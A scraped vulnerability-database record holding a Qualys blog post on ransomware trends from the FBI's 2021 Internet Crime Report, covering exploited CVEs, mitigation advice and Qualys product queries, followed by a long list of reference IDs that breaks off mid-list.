DATABASE RESOURCES PRICING ABOUT US

{"id": "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "Ransomware Insights from the FBI\u2019s 2021 Internet Crime Report", "description": "_The FBI has published its annual report on Internet crime. Qualys has analyzed its trends and statistics. In this post, we review our findings, especially with regards to the prevalence of Ransomware, and our recommendations for actions that enterprises should take to mitigate their risk._\n\nEvery year the U.S. Federal Bureau of Investigation publishes [an Internet crime report](<https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf>) which summarizes its insights on trends and threats from cybercriminals based on all cybercrimes reported to the FBI by the American public. This annual report provides fascinating insights into the threat landscape, key trends, statistics on types of crimes, the real losses resulting from them, and perhaps most importantly, key insights into how cybercriminals operate so that we can better prepare to guard against them.\n\nFor 2021 the FBI reported 5 key threats:\n\n 1. Business Email Compromise (BEC)\n 2. Confidence Fraud / Romance Scams\n 3. Cryptocurrency\n 4. Ransomware\n 5. Tech Support Fraud\n\nOf these threats, only ransomware complaints continue to rise. Ransomware reports increased by almost 51% compared to 2020.\n\nThese complaints resulted in a total of $50 million in losses in 2021, compared to $30 million in 2020\u2014a 66% rise in total losses. Ransomware attacks hit more than [290 enterprises in 2021](<https://www.zdnet.com/article/more-than-290-enterprises-hit-by-6-ransomware-groups-in-2021/>), including major organizations like [Colonial Pipeline](<https://www.bbc.com/news/business-57178503>), [Accenture](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>), [Acer](<https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/>), and [others](<https://illinois.touro.edu/news/the-10-biggest-ransomware-attacks-of-2021.php>).\n\n### Top Ransomware Attack Vectors of 2021\n\nRansomware tactics and techniques are evolving continuously, allowing attackers to make their exploits more sophisticated, resulting in an increasing ransomware threat to organizations globally. Although cybercriminals use a variety of techniques to infect victims with ransomware, the top three initial infection vectors reported remain phishing emails, Remote Desktop Protocol (RDP) exploitation, and software vulnerabilities.\n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *\n\n#### Top Ransomware Variants Exploited Vulnerabilities\n\nThe FBI\u2019s investigations isolated the top 3 ransomware variants that victims suffered: CONTI, LockBit, and REvil/Sodinokibi. The chart below tallies the number of incidents reported for each variant:\n\nSource: FBI\n\nThe report states, &quot;_According to information submitted to the Internet Crime Complaint Center (IC3), CONTI most frequently victimized the Critical Manufacturing, Commercial Facilities, and Food and Agriculture sectors. LockBit most frequently victimized the Government Facilities, Healthcare/Public Health, and Financial Services sectors. REvil/Sodinokibi most frequently victimized Financial Services, Information Technology, and Healthcare/Public Health sectors._&quot;\n\nThe increase in remote work due to the Pandemic made four specific infection vectors more popular. Typical delivery methods for these ransomware variants were:\n\n * **Spear phishing** \u2013 campaigns using tailored emails that contain malicious attachments or malicious links\n * **Remote Desktop Protocol (RDP)** credentials that are either stolen or weak\n * **Fake software** promoted via search engine optimization that tempts users to install\n * **Common vulnerabilities** exploited in external IT assets\n\nHere are a few examples of vulnerabilities exploited in 2021 to launch successful ransomware attacks.\n\n##### Conti\n\n * &quot;PrintNightmare&quot; vulnerability ([CVE-2021-34527](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Windows Print spooler service\n * &quot;Zerologon&quot; vulnerability ([CVE-2020-1472](<https://media.defense.gov/2021/Sep/22/2002859507/-1/-1/0/CSA_CONTI_RANSOMWARE_20210922.PDF>)) in Microsoft Active Directory Domain Controller systems\n\n##### LockBit\n\n * [CVE-2021-22986](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>) is a critical unauthenticated, remote code execution vulnerability in the iControl REST interface, affecting BIG-IP and BIG-IQ products. It was used in the [Accenture attack](<https://cybersecurityworks.com/blog/ransomware/csw-analysis-accenture-attacked-by-lockbit-2-0-ransomware.html>).\n\n##### REvil/Sodinokibi\n\n * [CVE-2018-8453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453>) vulnerability is exploited to elevate privileges\n\n### Recommended Ransomware Mitigations\n\n##### Update your operating system and software\n\nInternet-facing servers should be patched for known vulnerabilities regularly, as well as software processing internet data such as web browsers, browser plugins, and document readers. Software and operating systems should be upgraded regularly to the latest available version. The highest priority should be patching software and operating systems running versions that vendors no longer support.\n\n##### Implement user training and phishing exercises to raise awareness about the risks of suspicious links and attachments. Do not click on suspicious links!\n\nUser training has been proven to teach employees to avoid ransomware attacks from phishing and fake software.\n\n##### If you use Remote Desktop Protocol (RDP), secure and monitor it\n\nLimit access to resources over internal networks and monitor RDP access logs. Ensure devices are properly configured, and security features are enabled.\n\n##### Make an offline backup of your data\n\nRegularly run and maintain offline encrypted backups, then test them. Review the backup schedule of your organization and consider the possible backup disruption risk during weekends and holidays.\n\n##### Use strong passwords\n\nEnsure you have a strongly defined password policy, and ensure it is followed across the organization.\n\n##### Use multi-factor authentication\n\nApply multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems.\n\n##### Secure your network(s): implement segmentation, filter traffic, and scan ports\n\nThe most critical communications should be occurring in the most secure and reliable layer. Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.\n\nBlacklist the malicious URLs/websites. Scan networks for open and listening ports regularly and close those that are unnecessary.\n\n### How Can Qualys Help?\n\n##### Comprehensive Visibility into Critical Ransomware Risk Exposure\n\nGetting a complete view of your ransomware risk exposure is a big challenge. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) helps you gain comprehensive visibility into the vulnerabilities, misconfiguration postures, and unauthorized software installed on all assets across your enterprise. Along with that, you gain visibility into available patches and can deploy these patches on the assets impacted. Our dashboard provides a glimpse of critical ransomware risk exposure across your enterprise in one unified console.\n\n\n\n##### Continuous Detection &amp; Prioritization for Ransomware-specific Vulnerabilities\n\nThe first step toward securing your devices from ransomware is to get complete visibility of all assets in your organization. [Qualys CSAM](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides &quot;single pane of glass&quot; visibility of all asset types and helps to eliminate any blind spots. You also get visibility into unmanaged assets\n\nThe FBI\u2019s 2021 report clarifies that exploitation of software vulnerabilities remains one of the top three initial infection vectors for ransomware incidents. Most noteworthy is that the top vulnerabilities are exploited using fake software and/or software versions no longer supported by the vendor. CSAM provides visibility into unauthorized and end-of-life software. An unauthorized software list helps you identify fake software that has been installed from unknown sources. \n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *\n\nQualys VMDR helps you to monitor and detect ransomware vulnerabilities continuously. You can view the ransomware vulnerabilities detected on assets on which unauthorized software is running using Qualys Query Language (QQL):\n \n \n Asset dropdown - software:(authorization:Unauthorized) \n Vulnerability dropdown - vulnerabilities.vulnerability.threatIntel.ransomware:true\n\n\n\nYou can also identify all of the assets on which 2021\u2019s top three ransomware variants are detected: CONTI, LockBit, and REvil/Sodinokibi.\n\nQQL details are:\n \n \n (vulnerabilities.vulnerability.threatIntel.ransomware:true) and (vulnerabilities.vulnerability.ransomware.name:[REvil/Sodinokibi, Ryuk/Conti, lockBit])\n\n\n\nUsing Qualys VMDR prioritization, ransomware vulnerabilities can be easily prioritized by using &quot;Ransomware&quot; in the Real-Time Threat Indicator (RTI) filter section:\n\n\n\nAlong with vulnerabilities, Qualys VMDR also keeps you up to date on evolving threats via its &#x27;Live Threat Feed&#x27;, which can help with prioritization. The &quot;Live Threat Feed&quot; provides visibility of high, medium, and low-rate feeds along with a count of the impacted assets. Click on the count to view more details about the impacted assets.\n\nIn the &quot;Threat Feed&quot; tab, search using `contents:ransomware` to find all threats associated with ransomware.\n\n\n\n##### Discover and Mitigate Ransomware Misconfigurations\n\nMisconfigurations often play a vital role in ransomware attacks, as they might help the attacker gain access to your assets. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides comprehensive visibility into ransomware misconfigurations. The Ransomware Best Practices policy contains the critical controls mapped to MITRE ATT&amp;CK mitigations as well as tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attackers&#x27; initial access and lateral movement around your network.\n\nApply this ransomware policy to all assets across your enterprise to ensure that all assets are correctly configured. You can automate the configurations assessment and apply this to the golden images to confirm your security baselines before distribution.\n\nQualys Policy Compliance helps you to configure the recommended mitigations for the password, RDP, network security policy, and software update by applying the ransomware policies on the impacted assets.\n\n\n\n##### Automated Effortless Patching for Ransomware Vulnerabilities\n\nQualys [zero-touch patching](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>) helps you automatically patch new ransomware-related vulnerabilities that are being actively exploited in attacks. It is faster and more accurate than manual patching and helps to patch up to 97% of ransomware vulnerabilities.\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) provides a more efficient and effective way to proactively patch detected ransomware vulnerabilities. Qualys VMDR helps prioritize the ransomware vulnerabilities that Qualys PM executes. This tight integration enables you to initiate patch jobs directly from the Prioritization tab. Quick patching of critical ransomware vulnerabilities reduces ransomware risk. Auto-correlation of patches against the ransomware vulnerabilities detected reduces your overall remediation time and makes the IT team\u2019s job easier.\n\n\n\nReady to hear more? For more details, [watch this video](<https://vimeo.com/617379785>) on our Ransomware offering. Then try out our [Ransomware Risk Assessment &amp; Remediation Service](<https://www.qualys.com/forms/ransomware/>) at no cost for 60 days. Uncover your organization\u2019s level of exposure and create a prescribed patch plan to reduce your ransomware risk.\n\n* * *\n\n****Get instant visibility into ransomware exposure with Qualys Cloud Platform****\n\n[Try it Now](<https://www.qualys.com/forms/ransomware/>)\n\n* * *", "published": "2022-05-04T09:40:56", "modified": "2022-05-04T09:40:56", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "reporter": "Swapnil Ahirrao", "references": [], "cvelist": ["CVE-2018-8453", "CVE-2020-1472", "CVE-2021-22986", "CVE-2021-34527"], "immutableFields": [], "lastseen": "2022-05-05T07:29:09", "viewCount": 982, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:0A30FB79-83AC-42D6-964B-DD2D15CDC6C2", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E", "AKB:996F512E-5732-43D0-893D-0C8A55C070BF", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["SETWINDOWFNID_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:383432", "VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0996", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0198", "CPAI-2021-0465"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:367C27124C09604830E0725F5F3123F7", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:84B5063678E22C88DCF150A265C078F7", "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:A55091A825D08BAA55750010D4193771", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "cve", "idList": ["CVE-2018-8453", "CVE-2020-1472", "CVE-2021-22986", "CVE-2021-34527"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:47134", "EDB-ID:49071", "EDB-ID:49738"]}, {"type": "f5", "idList": ["F5:K56142644", "F5:K74151369", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "08530E98-10F4-5651-8118-F76E99D5856F", "0BB19334-D311-5464-B40B-7B27A0AD8825", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "20466D13-6C5B-5326-9C8B-160E9BE37195", "21F83D93-118D-50C7-A5C0-B2069237666E", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "3F400483-1F7E-5BE5-8612-4D55D450D553", "48FD5EC4-10B3-5CB3-96C6-4D70E2A52EEF", "49EC151F-12F0-59CF-960C-25BD54F46680", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E279194-AC85-5607-A943-AC23EADADEF7", "4E7397B3-57E1-5961-BE00-E340DD46B130", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "63C36F7A-5F99-5A79-B99F-260360AC237F", "64AAF745-D50D-575C-B3FF-A09072475502", "67F9A7F6-596E-5695-BCBF-B11FE476AD9E", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "8542D571-7253-5609-BC52-CBCB5F40929A", "86F04665-0984-596F-945A-3CA176A53057", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "91A5A7DD-3544-5856-890C-F8D738DAC6F4", "939F3BE7-AF69-5351-BD56-12412FA184C5", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "9C9BD402-511C-597D-9864-647131FE6647", "9E6B39D2-4F46-5C9D-81B9-32A2C96CBAD8", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "B8D9E2C0-202B-5806-88D2-B0E797582618", "B96958C0-96FF-52FF-A4B1-CE6F774F0C6F", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "BF090D08-5787-5245-85E4-88DA87E8EC1D", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "D089579B-4420-5AD5-999F-45063D972E66", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E235B3DF-990F-5508-9496-90462B45125D", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F6F649DA-905A-5158-B6BD-5A1F1F740C68", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hivepro", "idList": ["HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"]}, {"type": "kaspersky", "idList": ["KLA11333", "KLA11889", "KLA11929", "KLA11931", "KLA12213", "KLA12214"]}, {"type": "kitploit", "idList": ["KITPLOIT:232707789076746523"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:B1E4FC3B67F4D04866AEE77CDE9721A9"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_REST_SSRF_RCE-", "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2018_8453_WIN32K_PRIV_ESC-"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2018-8453", "MS:CVE-2020-1472", "MS:CVE-2021-1675", "MS:CVE-2021-34527"]}, {"type": "mskb", "idList": ["KB4463545", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "mssecure", "idList": ["MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "F5_BIGIP_SOL03009991.NASL", "F5_CVE-2021-22986.NBIN", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS18_OCT_4462917.NASL", "SMB_NT_MS18_OCT_4462918.NASL", "SMB_NT_MS18_OCT_4462919.NASL", "SMB_NT_MS18_OCT_4462922.NASL", "SMB_NT_MS18_OCT_4462923.NASL", "SMB_NT_MS18_OCT_4462926.NASL", "SMB_NT_MS18_OCT_4462929.NASL", "SMB_NT_MS18_OCT_4462937.NASL", "SMB_NT_MS18_OCT_4463097.NASL", "SMB_NT_MS18_OCT_4464330.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814078", "OPENVAS:1361412562310814079", "OPENVAS:1361412562310814080", "OPENVAS:1361412562310814081", "OPENVAS:1361412562310814082", "OPENVAS:1361412562310814083", "OPENVAS:1361412562310814084", "OPENVAS:1361412562310814085"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153669", "PACKETSTORM:160127", "PACKETSTORM:162059", "PACKETSTORM:162066", "PACKETSTORM:167261"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:72759E1136A76135F26DD97485912606", "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:3813D41319B88396F5995A4071DFA47F", "SECURELIST:52185495AADEC0E6183185DE5799E6B5", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:A40E939E20C451592F5ED01B134552A7", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", 